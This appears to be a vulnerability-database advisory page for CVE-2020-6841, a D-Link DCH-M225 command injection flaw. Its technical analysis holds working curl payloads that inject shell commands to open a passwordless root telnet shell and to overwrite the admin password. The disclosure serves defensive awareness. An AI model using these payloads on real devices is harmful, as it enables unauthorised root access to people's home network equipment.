Attacker Value
Low
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
0

CVE-2020-6841

Disclosure Date: February 21, 2020
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

D-Link DCH-M225 1.05b01 and earlier devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the spotifyConnect.php userName parameter.

Add Assessment

4
Ratings
Technical Analysis

This analysis is a transcript of a public gist – Original Source – https://gist.github.com/jezzaaa/38c752d0a129576b2cc523ce6325050f

D-Link DCH-M225 1.04 devices allow remote attackers to execute
arbitrary OS commands via shell metacharacters in the
spotifyConnect.php userName parameter.


[Additional Information]
From the local network (eg wifi), access the URL
http://ip-address/spotifyConnect.php with POST variables:

action=addUser userName=;/usr/sbin/telnetd -i br0 >/dev/null &;

For example, from a Linux command-line:

curl -d ‘action=addUser&userName=;/usr/sbin/telnetd -i br0 >/dev/null &;’ http://192.168.0.50/spotifyConnect.php

This starts a telnet daemon that provides a root shell with no
password.Then telnet to the device for a root shell.

The same exploit can be used to temporarily change the root password,
using something like:

curl -d ‘action=addUser&userName=;echo “\“Admin\” \“\” \“0\”“>/var/passwd.new;’ http://192.168.1.204/spotifyConnect.php

This exploit would also work on a network that exposes port 80 on the
device to the Internet, in which case this would allow a remote root
shell to an unprivileged user.

The vendor has stated that the device has been discontinued (as of
April 2018), and that they won’t be patching.

The vulnerable “Spotify Connect” feature of the product may have been
implemented on other devices that are still for sale or still under
support, possibly using the same vulnerable code implemented in
spotifyCode.php on this device. The vendor has been asked if any
of their other products use the same code, but they did not answer
this question.


[VulnerabilityType Other]
command injection (missing input validation, escaping)


[Vendor of Product]
D-Link


[Affected Product Code Base]
DCH-M225 Wi-fi Range Extender – 1.04


[Affected Component]
script spotifyConnect.php


[Attack Type]
Local


[Attack Vectors]
Submit HTTP request to add a Spotify Connect user (no admin auth
required), using a username containing a semicolon followed by an
arbitrary command (which runs as root) such as telnetd or commands to
modify the admin user’s password.


[References]
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10152
https://www.dlink.com.au/home-solutions/dch-m225-wi-fi-audio-extender
https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf
https://www.dlink.com/en/security-bulletin

General Information

Additional Info

Technical Analysis